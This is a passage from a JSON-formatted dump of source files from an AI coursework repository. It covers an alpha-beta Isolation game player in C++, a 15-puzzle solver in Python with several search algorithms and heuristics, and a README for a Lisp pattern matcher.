AggressivePlayer::AlphaBeta(Board board, Position my, Position her)\n{\n\tdouble alpha = DMIN;\n\tdouble beta = DMAX;\n\n\tScoreAction sa = MaxValue(board, my, her, alpha, beta, 0);\n\n\tif (sa.action.steps == -1) {\n\t\t//\t\tcout << \"We will lose. 
But try our best.\" << endl;\n\t\treturn LocalMove(board, my);\n\t}\n\n\tif (TryMove(board, my, sa.action.dir, sa.action.steps)) {\n\t\treturn MakeMove(my, sa.action);\n\t}\n\telse {\n\t\treturn Position(-1, -1);\n\t}\n}\n\nScoreAction AggressivePlayer::MaxValue(Board board, Position my, Position her,\n\t\t\t\t\t\t\t\t\t double alpha, double beta, int depth)\n{\n\t// I lose\n\tif (IsDead(board, my))\n\t\treturn ScoreAction(DMIN, kInvalidAction);\n\n\t// She lose\n\tif (IsDead(board, her)) {\n\t\tvector<Action> actions = GenerateActions(board, my);\n\t\treturn ScoreAction(DMAX, actions[0]);\n\t}\n\n\n\tif (depth <= 4 && steps_ > kEagerGameSteps) {\n\t\tdouble score = Eval2(board, my, her);\n\t\tif (score < -1) { // it is the same as i will be killed\n\t\t\treturn ScoreAction(DMIN, kInvalidAction);\n\t\t}\n\t}\n\n\t// Cutoff test\n\tif (Cutoff(board, my, her, depth))\n\t\treturn ScoreAction(Eval(board, my, her, depth), kInvalidAction);\n\n\tAction maxaction = kInvalidAction;\n\tvector<Action> actions = GenerateActions(board, my);\n\n\twhile (!actions.empty()) {\n\t\tint index = rand() % actions.size();\n\t\tAction action = actions[index];\n\t\tactions.erase(actions.begin()+index);\n\n\t\tDirection d = action.dir;\n\t\tint steps = action.steps;\n\t\tPosition npos = MakeMove(my, action);\n\n\t\tBoard nboard;\n\t\tdouble score = 0;\n\t\tif (!(nboard = TryMove(board, my, d, steps)))\n\t\t\tcontinue;\n\n\t\tscore = MinValue(nboard, npos, her, alpha, beta, depth+1).score;\n\n\t\tif (score > alpha) {\n\t\t\talpha = score;\n\t\t\tmaxaction = Action(d,steps);\n\t\t}\n\n\t\tif (alpha >= beta)\n\t\t\treturn ScoreAction(alpha, maxaction);\n\t}\n\n\treturn ScoreAction(alpha, maxaction);\n}\n\n\nScoreAction AggressivePlayer::MinValue(Board board, Position my, Position her,\n\t\t\t\t\t\t\t\t\t double alpha, double beta, int depth)\n{\n\t// She lose\n\tif (IsDead(board, her))\n\t\treturn ScoreAction(DMAX, kInvalidAction);\n\n\t// I lose\n\tif (IsDead(board, my)) {\n\t\tvector<Action> actions = GenerateActions(board, her);\n\t\treturn ScoreAction(DMIN, actions[0]);\n\t}\n\n\t// THIS IS AGGRESSIVE MODE\n\n\tif (depth <= 3 && steps_ > kEagerGameSteps) {\n\t\tdouble score = Eval2(board, my, her);\n\t\tif (score > 1) { // avoid rounding error\n\t\t\treturn ScoreAction(DMAX, kInvalidAction);\n\t\t}\n\t}\n\t\n\t\n\t// Cutoff test\n\tif (Cutoff(board, my, her, depth))\n\t\treturn ScoreAction(Eval(board, her, my, depth), kInvalidAction);\n\n\tAction minaction = kInvalidAction;\n\tvector<Action> actions = GenerateActions(board, her);\n\n\twhile (!actions.empty()) {\n\t\tint index = rand() % actions.size();\n\t\tAction action = actions[index];\n\t\tactions.erase(actions.begin()+index);\n\n\t\tDirection d = action.dir;\n\t\tint steps = action.steps;\n\t\tPosition npos = MakeMove(her, action);\n\n\t\tBoard nboard;\n\t\tdouble score = 0;\n\t\tif (!(nboard = TryMove(board, her, d, steps))) // she tries to move\n\t\t\tcontinue;\n\n\t\tif (score == 0)\n\t\t\tscore = MaxValue(nboard, my, npos, alpha, beta, depth+1).score;\n\n\t\tif (score < beta) {\n\t\t\tbeta = score;\n\t\t\tminaction = Action(d, steps);\n\t\t}\n\n\t\tif (beta <= alpha)\n\t\t\treturn ScoreAction(beta, minaction);\n\t}\n\n\treturn ScoreAction(beta, minaction);\n}\n\nPosition AggressivePlayer::Move(Board board, Position my, Position her)\n{\n\t// increase the steps as we move\n\tsteps_++;\n\n\tif (isolated_) // if isolated, do local move!\n\t\treturn LocalMove(board, my);\n\telse { // otherwise, adversial game!\n\t\t// check isolation\n\n\t\tbool test = 
IsIsolated(board, my, her);\n\t\tif (test) {\n\t\t\t//\t\t\tcout << \"Switching to local mode.\" << endl;\n\t\t\tisolated_ = true;\n\t\t\thersteps_ = MaxClosure(board, her);\n\t\t\treturn LocalMove(board, my);\n\t\t}\n\t\treturn AlphaBeta(board, my, her);\n\t}\n}\n\n"
},
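MaxValue/MinValue in nplayer.cc above implement minimax with alpha-beta cutoffs (prune when alpha >= beta on the maximizing side, beta <= alpha on the minimizing side). As a compact reference for that pruning rule, here is a generic Python sketch; the moves/apply_move/evaluate callables and the depth limit are stand-ins, not names from the C++ source.

    # Generic minimax with alpha-beta pruning; the cutoff tests match the
    # ones in MaxValue/MinValue. All game-specific callables are stand-ins.
    def alphabeta(state, depth, alpha, beta, maximizing,
                  moves, apply_move, evaluate, max_depth=5):
        options = moves(state, maximizing)
        if depth == max_depth or not options:
            return evaluate(state)
        if maximizing:
            for m in options:
                alpha = max(alpha, alphabeta(apply_move(state, m), depth + 1,
                                             alpha, beta, False, moves,
                                             apply_move, evaluate, max_depth))
                if alpha >= beta:   # beta cutoff, as in MaxValue
                    break
            return alpha
        else:
            for m in options:
                beta = min(beta, alphabeta(apply_move(state, m), depth + 1,
                                           alpha, beta, True, moves,
                                           apply_move, evaluate, max_depth))
                if beta <= alpha:   # alpha cutoff, as in MinValue
                    break
            return beta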
{
"alpha_fraction": 0.5892018675804138,
"alphanum_fraction": 0.6049935817718506,
"avg_line_length": 18.772151947021484,
"blob_id": "be20e3f72387b28cbeac833d38cc7b12487b6e90",
"content_id": "85e5be9575dd417651049a3240d23c8c8ba8f3ce",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 4686,
"license_type": "no_license",
"max_line_length": 101,
"num_lines": 237,
"path": "/isolation/src/game.cc",
"repo_name": "koushikg14/ai",
"src_encoding": "UTF-8",
"text": "//#define TEST\n\n#include <cassert>\n#include <cmath>\n#include <stdio.h>\n#include <stdlib.h>\n#include <queue>\n#include <set>\n#include <sstream>\n#include <iostream>\n\n#include \"game.h\"\n#include \"player.h\"\n#include \"nplayer.h\"\n#include \"dumb.h\"\n#include \"human.h\"\n#include \"util.h\"\n\nusing namespace std;\n\nGame::Game() {\n\tboard_ = kInvalidBoard;\n\tpositions_[0] = kFirstPos;\n\tpositions_[1] = kSecondPos;\n\tsetpos(board_, kFirstPos.row, kFirstPos.col);\n\tsetpos(board_, kSecondPos.row, kSecondPos.col);\n}\n\n\nGame::~Game()\n{\n\tfor (int player = 0; player < 1; player++) {\n\t\tif (players_[player] != NULL)\n\t\t\tdelete players_[player];\n\t\tplayers_[player] = NULL;\n\t}\n}\n\n\nbool IsDead(Board board, Position pos)\n{\n\treturn GenerateActions(board, pos).size() == 0;\n}\n\n\nbool ValidateMove(Board board, Position current, Position move)\n{\n\tif (move.row == -1 && move.col == -1) {\n\t\tcout << \"no way to go.\" << endl;\n\t\treturn false;\n\t}\n\n\t// check if moves out of the board\n\tif (move.row < 0 || move.col < 0 ||\n\t\tmove.row >= kBoardSize || move.col >= kBoardSize) {\n\t\tcout << \"moves out of the board.\" << endl;\n\t\treturn false;\n\t}\n\n\t// check if stay\n\tif (move == current) {\n\t\tcout << \"did not move.\" << endl;\n\t\treturn false;\n\t}\n\n\tint ro, co;\n\tunsigned int nsteps;\n\n\tif (current.row == move.row) { // horizontal move\n\t\tro = 0;\n\t\tco = current.col < move.col ? 1 : -1;\n\t\tnsteps = abs(current.col - move.col);\n\t}\n\telse if (current.col == move.col) { \t// vertical move\n\t\tro = current.row < move.row ? 1 : -1;\n\t\tco = 0;\n\t\tnsteps = abs(current.row - move.row);\n\t}\n\telse if (abs(current.row-move.row)==abs(current.col-move.col)) {\n\t\t// diagonal move\n\t\tro = current.row < move.row ? 1 : -1;\n\t\tco = current.col < move.col ? 
1 : -1;\n\t\tnsteps = abs(current.row-move.row);\n\t}\n\telse {\n\t\tcout << \"move into a wrong direction.\" << endl;\n\t\treturn false;\n\t}\n\n\tfor (unsigned int step = 1; step <= nsteps; step++) {\n\t\tif (getpos(board, current.row + ro * step, current.col + co * step)) {\n\t\t\tcout << \"jumps over a occupied square\" << endl;\n\t\t\treturn false;\n\t\t}\n\t}\n\treturn true;\n}\n\nvector<Action> GenerateActions(Board board, Position cur)\n{\n\tvector<Action> actions;\n\tfor (int d = 0; d < 8; d++)\n\t\tfor (int steps = 1; steps < kBoardSize; steps++) \n\t\t\tif (TryMove(board, cur, (Direction)d, steps))\n\t\t\t\tactions.push_back(Action((Direction)d, steps));\n\t\t\telse\n\t\t\t\tbreak;\n\treturn actions;\n}\n\n\nvoid Game::ApplyMove(int mover, Position move)\n{\n\tsetpos(board_, move.row, move.col);\n\tpositions_[mover] = move;\n}\n\nvoid Game::Gameover(int mover)\n{\n\tcout << players_[mover]->name() << \" lose!\" << endl;\n}\n\nint Game::Play()\n{\n\tPrint();\n\n\tint mover = 0;\n\twhile (1) {\n\t\tPosition yourpos = positions_[mover];\n\t\tPosition herpos = positions_[1-mover];\n\t\tPosition move = players_[mover]->Move(board_, yourpos, herpos);\n\n\t\t// Validate\n\t\tif (!ValidateMove(board_,positions_[mover], move)) {\n\t\t\tGameover(mover);\n\t\t\tPrint();\n\t\t\treturn 1 - mover;\n\t\t}\n\n\t\t// update the board\n\t\tApplyMove(mover, move);\n\n\t\tcout << players_[mover]->name() << \" moves to (\" << move.row+1 << \",\" << move.col+1 << \")\" << endl;\n\n\t\tPrint();\n\n\t\t// flip the turn\n\t\tmover = 1 - mover;\n\t}\n}\n\n\nvoid Game::Print()\n{\n\tprint(board_, positions_[0], positions_[1]);\n}\n\nint main(int argc, char *argv[])\n{\n\tsrand(time(NULL));\n\n#ifndef TEST\n\tGame g;\n\tPlayer *player1;\n\tPlayer *player2;\n\t\n\tstring name1;\n\tstring name2;\n\tint fp = -1;\n\tstring yn;\n\tstring str;\n\n\tcout << \"Input player1 name: \";\n\tgetline(cin, name1);\n\tcout << name1 << \" joins the game.\" << endl;\n\n\tcout << \"Input player2 name: \";\n\tgetline(cin, name2);\n\tcout << name2 << \" joins the game.\" << endl;\n\n\tdo {\n\t\tcout << name1 << \" is robot? (Y/N)\";\n\t\tgetline(cin, yn);\n\t} while (yn[0] != 'Y' && yn[0] != 'N');\n\n\tif (yn[0] == 'Y')\n\t\tplayer1 = new AggressivePlayer(name1);\n\telse\n\t\tplayer1 = new HumanPlayer(name1);\n\n\tdo {\n\t\tcout << name2 << \" is robot? (Y/N)\";\n\t\tgetline(cin, yn);\n\t} while (yn[0] != 'Y' && yn[0] != 'N');\n\n\tif (yn[0] == 'Y')\n\t\tplayer2 = new AggressivePlayer(name2);\n\telse\n\t\tplayer2 = new HumanPlayer(name2);\n\n\tdo {\n\t\tcout << \"Who starts first? (1/2):\";\n\t\tgetline(cin, str);\n\t\tistringstream iss(str);\n\t\tiss >> fp >> std::ws;\n\t\tif (iss.fail() || !iss.eof())\n\t\t\tcout << \"Please input (1/2).\" << endl;\n\t\telse\n\t\t\tbreak;\n\t} while (1);\n\n\tif (fp == 1) {\n\t\tg.AddFirstPlayer(player1);\n\t\tg.AddSecondPlayer(player2);\n\t}\n\telse {\n\t\tg.AddFirstPlayer(player2);\n\t\tg.AddSecondPlayer(player1);\n\t}\n\tg.Play();\n#else\n\tint wins = 0;\n\tfor (int i = 0; i < 20; i++) {\n\t\tGame g;\n\t\tPlayer *dumb = new MyPlayer(\"dumb\");\n\t\tPlayer *aggressive = new AggressivePlayer(\"aggressive\");\n\t\tg.AddFirstPlayer(dumb);\n\t\tg.AddSecondPlayer(aggressive);\n\t\tint winner = g.Play();\n\t\twins += winner;\n\n\t\tcout << wins << \"/\" << i+1 << endl;\n\n\t}\n\tcout << wins << endl;\n#endif\n}\n"
},
{
"alpha_fraction": 0.5100393295288086,
"alphanum_fraction": 0.5337059497833252,
"avg_line_length": 28.447154998779297,
"blob_id": "3e0f331b209b4a08e9b5d0989da58429562ebe0e",
"content_id": "91186c64d1f80eb1b421aa8ed04e5d9640f43600",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 14493,
"license_type": "no_license",
"max_line_length": 158,
"num_lines": 492,
"path": "/puzzle/puzzle.py",
"repo_name": "koushikg14/ai",
"src_encoding": "UTF-8",
"text": "\"\"\"\n15 Puzzles\n\n\"\"\"\n\nimport sys\nimport string\nimport heapq\nimport itertools\nfrom random import randint\nfrom random import shuffle\nfrom collections import deque\n\n#------------------------------------------------\n# Board settings\n\ndirections = ['N','S','W','E']\nmaxnodes = 50000\nmaxdepth = 20\nmaxtraindep = 18\n\nN = 15\nboard_size = 4\n\nloops = list(itertools.product(range(board_size), range(board_size)))\n\n#------------------------------------------------\n# Class definitions\n\nclass Solution:\n def __init__(self, algo, steps, stats):\n self.algo = algo\n self.steps = steps\n self.stats = stats\n\n def __str__(self):\n outs = self.algo + \":\\n\"\n outs += \"(\"\n outs += \"(\"\n if self.steps: \n outs += (\"(\" + string.join(self.steps, \" \") + \") \")\n outs += str(len(self.steps))\n else:\n outs += \"NIL NIL\"\n outs += \") \"\n outs += string.join(map(str, self.stats), \" \")\n outs += \")\"\n return outs\n\nclass State:\n offsets = { \"N\": (-1, 0),\n \"S\": ( 1, 0),\n \"W\": ( 0, -1),\n \"E\": ( 0, 1)}\n\n def at(self,r,c):\n return (self.coding>>((r*4+c)*4)) & N\n\n def set(self, r, c, v):\n self.coding |= (v<<((r*4+c)*4))\n\n def clear(self,r,c):\n self.coding &= ~(N<<((r*4+c)*4))\n\n # return the coding with all tiles not in the pattern masked\n def mask(self, pattern):\n masked = self.coding\n for r,c in loops:\n if self.at(r,c) not in pattern:\n masked &= ~(N<<((r*4+c)*4))\n return masked\n \n def __init__(self, coding, blank, parent=None, action=None, cost=0):\n self.coding = coding\n self.blank = blank\n self.parent = parent\n self.action = action\n self.cost = cost\n \n def swap(self, row, col, ro, co):\n self.blank = (row+ro,col+co)\n self.set(row,col,self.at(row+ro,col+co))\n self.clear(row+ro,col+co)\n\n def move(self, direction, cost=1):\n row, col = self.blank\n ro, co = State.offsets[direction]\n if row+ro >= 0 and row+ro < board_size and col+co >= 0 and col+co < board_size: \n child = State(self.coding,self.blank,self,direction,self.cost+cost)\n child.swap(row,col,ro,co)\n return child\n else:\n return None \n\n def trace(self):\n steps = []\n node = self\n while node.parent:\n steps.append(node.action)\n node = node.parent\n return steps\n \n def win(self, goal): \n return self.coding == goal.coding\n\n def __hash__(self):\n return hash(self.coding) # hash(blank), depends on which one is faster\n \n def __eq__(self, other):\n return self.blank==other.blank and self.coding==other.coding\n \n def __str__(self):\n string = \"-------------------\\n\"\n for r in range(board_size):\n for c in range(board_size):\n string += (\"%4d\" % self.at(r, c))\n string += \"\\n\"\n string += \"-------------------\\n\"\n return string\n\n#------------------------\n# puzzle generator\n\ndef generate_random():\n x = range(0,N+1)\n shuffle(x)\n \n pos = x.index(0)\n row = pos / board_size\n col = pos % board_size\n\n game = State(0L,(row,col))\n for n, i in zip(x, range(N+1)):\n r = i / board_size\n c = i - r * board_size\n game.set(r,c,n)\n game.blank = (row,col)\n return game\n\ndef generate(goal, nsteps):\n def random_dir():\n return directions[randint(0, len(directions)-1)]\n\n current = goal\n visited = set()\n visited.add(goal.coding)\n step = 0\n while step < nsteps:\n d = random_dir()\n next = current.move(d)\n if next and next.coding not in visited:\n visited.add(next.coding)\n current = next\n step += 1\n current.parent = current.action = None\n current.cost = 0\n return current\n\n#------------------------\n# dfs\n\ndef do_dfs(start, goal, 
maxd):\n total = repeats = 0\n visited = set()\n frontier = [] # use list to simulate the stack\n frontier.append(start)\n visited.add(start.coding)\n\n while frontier:\n current = frontier.pop()\n if current.win(goal):\n return (current.trace(), (total, repeats, len(frontier), 0))\n \n if current.cost >= maxd: continue\n\n for direction in directions:\n child = current.move(direction)\n if not child: continue\n\n total += 1\n frontier.append(child)\n if child.coding not in visited:\n visited.add(child.coding)\n else:\n repeats += 1\n return (None, (total, repeats, len(frontier), 0))\n\n# TODO: statistics not counted\ndef dfs_recursive(node, goal, depth):\n if node.win(goal):\n return (node.trace(), (0,0,0,0))\n elif depth == 0: return (None,(0,0,0,0))\n\n for direction in directions:\n child = node.move(direction)\n if not child: continue\n result = dfs_recursive(child, goal, depth-1) \n if result[0]:\n return result\n return (None, (0,0,0,0))\n \ndef dfs(start, goal):\n '''DFS'''\n return do_dfs(start, goal, maxdepth)\n\ndef idfs(start, goal):\n '''IDFS'''\n def update_stats(stats, ns):\n return (stats[0]+ns[0], stats[1]+ns[1], ns[2], ns[3])\n \n depth = 0\n stats = (0,0,0,0)\n for depth in range(maxdepth):\n solution = do_dfs(start, goal, depth)\n stats = update_stats(stats, solution[1])\n if solution[0]:\n return (solution[0], stats)\n return (None, stats)\n\n#------------------------\n \ndef bfs(start, goal):\n '''BFS'''\n total = repeats = 0\n frontier = deque() # FIFO queue\n visited = set()\n visited.add(start.coding)\n frontier.append(start)\n \n while frontier:\n current = frontier.popleft()\n\n if current.win(goal):\n return (current.trace(), (total, repeats, len(frontier), len(visited)-len(frontier)-1))\n \n for direction in directions:\n child = current.move(direction)\n if not child: continue\n\n total += 1\n if child.coding not in visited:\n frontier.append(child)\n visited.add(child.coding)\n else:\n repeats += 1\n return (None, (total, repeats, len(frontier), len(visited)-len(frontier)-1))\n\n\n#------------------------\n# Be careful about the stability issue in heapq\n \ndef search(start, goal, costfun, hfun):\n total = repeats = 0 \n frontier = []\n visited = set()\n heapq.heappush(frontier, (hfun(start,goal), start))\n visited.add(start.coding)\n\n while frontier:\n f, current = heapq.heappop(frontier)\n if current.win(goal):\n return (current.trace(), (total, repeats, len(frontier), len(visited)-len(frontier)-1))\n\n if total > maxnodes: break\n \n for direction in directions:\n child = current.move(direction, costfun(direction))\n if child is None: continue\n\n fvalue = child.cost + hfun(child, goal) \n total += 1\n if child.coding not in visited:\n heapq.heappush(frontier, (fvalue, child))\n visited.add(child.coding)\n else:\n repeats += 1 \n # Ugly update\n index = [idx for idx in range(len(frontier)) if frontier[idx][1]==child]\n if len(index) == 1 and frontier[index[0]][0] > fvalue:\n frontier[index[0]] = (fvalue, child)\n heapq.heapify(frontier)\n \n return (None, (total, repeats, len(frontier), len(visited)-len(frontier)-1))\n \n\ndef h_none(state1, state2):\n return 0\n\ndef uniform_cost(action):\n return 1\n\ndef zero_cost(action):\n return 0\n \ndef h_manhattan(state1, state2):\n pos1 = [0] * 16\n pos2 = [0] * 16 \n \n for r,c in loops:\n pos1[state1.at(r,c)] = (r,c)\n pos2[state2.at(r,c)] = (r,c)\n\n pos1[0] = pos2[0] = (0,0)\n dist = sum([abs(x[0]-y[0])+abs(x[1]-y[1]) for x,y in zip(pos1, pos2)])\n return dist\n\nclass PatternDB:\n def __init__(self, 
pattern):\n self.pattern = pattern\n self.cache = {}\n\n def search(self, state):\n code = state.mask(self.pattern)\n return self.cache.get(code, 0)\n\n def add(self, state, steps):\n code = state.mask(self.pattern)\n if code not in self.cache:\n self.cache[code] = steps\n\n \npatterns = [[1,2,3,4,5,6,7,8],[9,10,11,12,13,14,15]] \n#patterns = [[x] for x in range(1,16)] # train manhattan\n\nclass PatternState(State):\n def __init__(self, coding, blank, steps=0, parent=None, action=None, cost=0):\n self.steps = steps\n State.__init__(self,coding, blank, parent, action, cost) \n \n def move(self, direction, cost=1):\n row, col = self.blank\n ro, co = State.offsets[direction]\n \n if row+ro >= 0 and row+ro < board_size and col+co >= 0 and col+co < board_size: \n child = PatternState(self.coding,self.blank,self.steps,self,direction,self.cost+cost)\n child.swap(row,col,ro,co)\n v = child.at(row,col)\n if v != 0: child.steps += 1\n return child\n else:\n return None \n\n \ndef train_pattern(goal, pattern):\n db = PatternDB(pattern)\n goal = PatternState(goal.coding, goal.blank)\n goal.coding = goal.mask(pattern)\n frontier = deque() # FIFO queue\n visited = set()\n visited.add((goal.coding, goal.blank))\n frontier.append(goal)\n \n while frontier:\n current = frontier.popleft()\n db.add(current, current.steps) \n \n if current.cost > maxtraindep: break\n \n for direction in directions:\n child = current.move(direction)\n if not child: continue\n\n if (child.coding,child.blank) not in visited:\n frontier.append(child)\n visited.add((child.coding, child.blank))\n return db\n \npdbs = [] \ndef train(goal):\n for pattern in patterns:\n pdbs.append(train_pattern(goal, pattern))\n \ndef h_patterndb(state, goal):\n h = sum([pdb.search(state) for pdb in pdbs])\n return max(h, h_manhattan(state,goal))\n \ndef h_linear_conflict(s, goal):\n # return a priority queue\n # key: num of conflict\n # value: (tile id, <list-of-conflict-ids>)\n def nconflict(values, goal):\n both = set(values).intersection(set(goal))\n if 0 in both:\n both.remove(0)\n q = []\n for v in both:\n conflicts = []\n for v2 in both:\n if v==v2: continue\n if (values.index(v)<values.index(v2) and goal.index(v)>goal.index(v2)) or (values.index(v)>values.index(v2) and goal.index(v)<goal.index(v2)):\n conflicts.append(v2)\n if len(conflicts) > 0:\n heapq.heappush(q, (-len(conflicts), (v, conflicts)))\n return q\n \n\n def ith(state, axis, i):\n ilist = []\n for j in range(4):\n v = state.at(i,j) if axis==\"row\" else state.at(j,i)\n ilist.append(v)\n return ilist\n\n lcs = []\n for axis, i in itertools.product([\"row\",\"col\"],range(4)):\n lci = 0\n conflicts = nconflict(ith(s,axis,i), ith(goal,axis,i))\n while conflicts: # conflicts is priority queue\n nc,(v,cfs) = heapq.heappop(conflicts)\n for idx in range(len(conflicts)):\n nc2,(v2,cfs2) = conflicts[idx]\n if v in cfs2:\n cfs2.remove(v)\n conflicts[idx] = (-len(cfs2), (v2, cfs2))\n heapq.heapify(conflicts)\n lci += 1\n lcs.append(lci)\n return 2*sum(lcs) + h_manhattan(s, goal)\n\ndef uniform(start, goal):\n '''Uniform'''\n return search(start, goal, uniform_cost, h_none)\n \ndef astar_pattern(start, goal):\n '''A* - Pattern DBs'''\n return search(start, goal, uniform_cost, h_patterndb)\n \ndef greedy_lc(start, goal):\n '''Greedy - Manhattan + Linear conflicts'''\n return search(start, goal, zero_cost, h_linear_conflict)\n\ndef astar_lc(start, goal):\n '''A* - Manhattan + Linear conflicts'''\n return search(start, goal, uniform_cost, h_linear_conflict)\n\ndef astar(start, goal):\n '''A* - 
Manhattan'''\n return search(start, goal, uniform_cost, h_manhattan)\n\ndef greedy(puzzle, goal):\n '''Greedy - Manhattan'''\n return search(puzzle, goal, zero_cost, h_manhattan)\n\ndef solve(puzzle, goal, algo):\n solution = algo(puzzle, goal)\n return Solution(algo.__doc__, solution[0], solution[1])\n\nhard = \"((1 5 3 7) (4 9 2 11) (8 13 10 14) (12 15 0 6) (3 2))\"\nhard2 = \"( (1 2 3 7) (4 5 6 15) (8 9 11 0) (12 13 14 10) (2 3) )\"\neasy = \"((1 2 3 0) (4 5 6 7) (8 9 10 11) (12 13 14 15) (0 3))\"\nmoderate = \"((1 2 6 3) (4 5 10 7) (0 9 14 11) (8 12 13 15) (2 0))\"\ngoal1 = \"((0 1 2 3) (4 5 6 7) (8 9 10 11) (12 13 14 15) (0 0))\"\ngoal2 = \"((1 2 3 4) (8 7 6 5) (9 10 11 12) (0 15 14 13) (3 0))\"\n\nimport re\ndef parse_state(statestr):\n statestr.strip('\"\\'')\n statestr = statestr[1:-1] # remove parenthesis\n rowsstr = re.findall('\\(.*?\\)', statestr) \n blank = tuple(map(int, rowsstr[-1][1:-1].split(' ')))\n rows = [map(int, row[1:-1].split(' ')) for row in rowsstr[0:-1]]\n\n state = State(0L,blank)\n for r,c in loops:\n state.set(r,c,rows[r][c])\n return state\n\nimport time\n\nif __name__ == \"__main__\":\n if len(sys.argv) != 3:\n print \"Usage: python puzzle.py <start-state> <goal-state>\"\n sys.exit(1)\n start = parse_state(sys.argv[1])\n goal = parse_state(sys.argv[2])\n\n print \"Training patterns: maximum training depth is %d\" % maxtraindep\n print \"Cutoff depth for DFS and IDFS is %d\" % maxdepth\n print \"Cutoff nodes visited for uniform/greedy/astar search is %d\" % maxnodes\n\n t = time.clock()\n train(goal)\n print \"Training time: \", time.clock() - t, \" cpu seconds\"\n\n algos = [bfs,dfs,idfs,uniform,astar,greedy,astar_lc,greedy_lc,astar_pattern]\n\n t = time.clock() \n solutions = [solve(start, goal, algo) for algo in algos]\n print \"Running time: \", time.clock() -t\n \n for solution in solutions:\n print solution\n \n"
},
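puzzle.py's h_linear_conflict above adds 2 moves per resolved conflict on top of the Manhattan distance. To make the idea concrete, here is a simplified pair-counting version for a single row; note it is weaker than the greedy resolution in puzzle.py (which removes the most-conflicted tile first), and the helper name is mine, not the project's.

    # Simplified linear-conflict count for one row: two tiles conflict when
    # both belong in this row but sit in reversed relative order; each such
    # pair forces at least two extra moves beyond Manhattan distance.
    # This pair count is a simplification of puzzle.py's greedy resolution.
    def row_conflicts(row, goal_row):  # hypothetical helper
        tiles = [t for t in row if t in goal_row and t != 0]
        pairs = 0
        for i in range(len(tiles)):
            for j in range(i + 1, len(tiles)):
                if goal_row.index(tiles[i]) > goal_row.index(tiles[j]):
                    pairs += 1
        return pairs

    # Tiles 1 and 2 sit in reversed order within their goal row, so the
    # heuristic may add 2 moves on top of their Manhattan distance.
    assert row_conflicts([2, 1, 0, 3], [1, 2, 3, 0]) == 1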
{
"alpha_fraction": 0.7022222280502319,
"alphanum_fraction": 0.7022222280502319,
"avg_line_length": 16.30769157409668,
"blob_id": "fb13b3e9ffc4933876eae0f1b8210aa101fc76e6",
"content_id": "73dac4c28947e7acd6a312eeefa49e9fbe60e296",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C",
"length_bytes": 225,
"license_type": "no_license",
"max_line_length": 60,
"num_lines": 13,
"path": "/isolation/src/util.h",
"repo_name": "koushikg14/ai",
"src_encoding": "UTF-8",
"text": "#ifndef UTIL_H_\n#define UTIL_H_\n\n#include \"types.h\"\n\nvoid print(Board board, Position playerA, Position playerB);\n\nbool getpos(Board board, int row, int col);\n\nvoid setpos(Board &board, int row, int col);\n\n\n#endif // UTIL_H_\n"
},
{
"alpha_fraction": 0.6737043857574463,
"alphanum_fraction": 0.7087332010269165,
"avg_line_length": 29.632352828979492,
"blob_id": "0b0f1d64e1aea26ffe2182373718c5e8c21fc3ba",
"content_id": "471097925e220ec6717a529d9d3f3f1cfd4d7204",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 2084,
"license_type": "no_license",
"max_line_length": 197,
"num_lines": 68,
"path": "/pattern-match/README.md",
"repo_name": "koushikg14/ai",
"src_encoding": "UTF-8",
"text": "Pattern Match\n\nCOMS 4701 Artificial Intelligence Project 1\n\n=============\n\nInput format: \n(load \"match-pre.lisp\") or (load \"match-post.lisp\")\n\n(pattern-match pattern data)\n---------------------------\n\nExamples:\n\n(pattern-match '(?x 2 (?x)) '(1 2 (1))) \n((?x 1))\n \n(pattern-match '(?x 2 (?x)) '(3 2 (1))) \nNIL\n \n(pattern-match '(1 (* ?x *)) '(1 (a (b c) d))) \n(((?x a)) ((?x (b c))) ((?x d)))\n\n\nPattern matching can be modeled as a search problem on the syntax tree\nof pattern and data. We use DFS search to search for matching\npatterns.\n\nHere, I implemented two versions of pattern matching. The first\nversion 'match-post.lsp\" uses post-order traversal in DFS. The other\nversion, 'match-pre.lsp\" searches in pre-order.\n\nPost-order traversal first generates the bindings for subtrees before\nexamining the consistency with their parents. In the pre-order traversal\nversion, bindings are passed from parents to their children. If there\nis conflicts when matching children, nil value is returned. If no\nconflict is found, we expand the binding and continue to search down.\n\n \n---------------------------\nMore about testing\n---------------------------\n'test.lsp' is a simple test script to check the\nresult.\n(runtest) validates the correctness of our implementations.\n\nNote that if it prints out \"Test fails\", it does not necessarily mean the answer is not correct. In some test cases, I am just producing the result in different orders. The order should not matter.\n\n(time (runtesttime)) tests the performance of our implementations.\n\n\nHere is the profiling result running the compiled version in clisp on my desktop:\n\nPerformance of post-order version:\nReal time: 0.779717 sec.\nRun time: 0.776048 sec. \nSpace: 14240000 Bytes \nGC: 16, GC time: 0.020001 sec.\n\nPerformance of pre-order version:\nReal time: 0.80227 sec.\nRun time: 0.80005 sec.\nSpace: 20480000 Bytes\nGC: 24, GC time: 0.024 sec.\n\nPost-order version is slightly faster than the pre-order version and\nits space usage is only half the size of the pre-order version. But\nits code size is slightly more than the pre-order version.\n\n"
},
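The README above describes DFS over the pattern's syntax tree with consistent ?x bindings. To make the binding-consistency idea concrete outside Lisp, here is a minimal Python sketch covering only ?var atoms and nested lists (the * segment operator from the third example is omitted); it is an illustration, not the project's implementation.

    # A '?var' atom matches anything but must match the same value everywhere;
    # lists match element-wise. The '*' segment operator is not handled here.
    def pattern_match(pattern, data, bindings=None):
        bindings = dict(bindings or {})
        if isinstance(pattern, str) and pattern.startswith('?'):
            if pattern in bindings:  # already bound: must agree
                return bindings if bindings[pattern] == data else None
            bindings[pattern] = data
            return bindings
        if isinstance(pattern, list) and isinstance(data, list):
            if len(pattern) != len(data):
                return None
            for p, d in zip(pattern, data):
                bindings = pattern_match(p, d, bindings)
                if bindings is None:  # conflict in a subtree: fail
                    return None
            return bindings
        return bindings if pattern == data else None

    # Mirrors the README's first two examples:
    assert pattern_match(['?x', 2, ['?x']], [1, 2, [1]]) == {'?x': 1}
    assert pattern_match(['?x', 2, ['?x']], [3, 2, [1]]) is None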
{
"alpha_fraction": 0.595652163028717,
"alphanum_fraction": 0.602173924446106,
"avg_line_length": 17.399999618530273,
"blob_id": "5393ad4b1e2c37be04567ad66825d77ce6e8865c",
"content_id": "671205c4ba995f1248cbb13d7df330248b5bd8dd",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 920,
"license_type": "no_license",
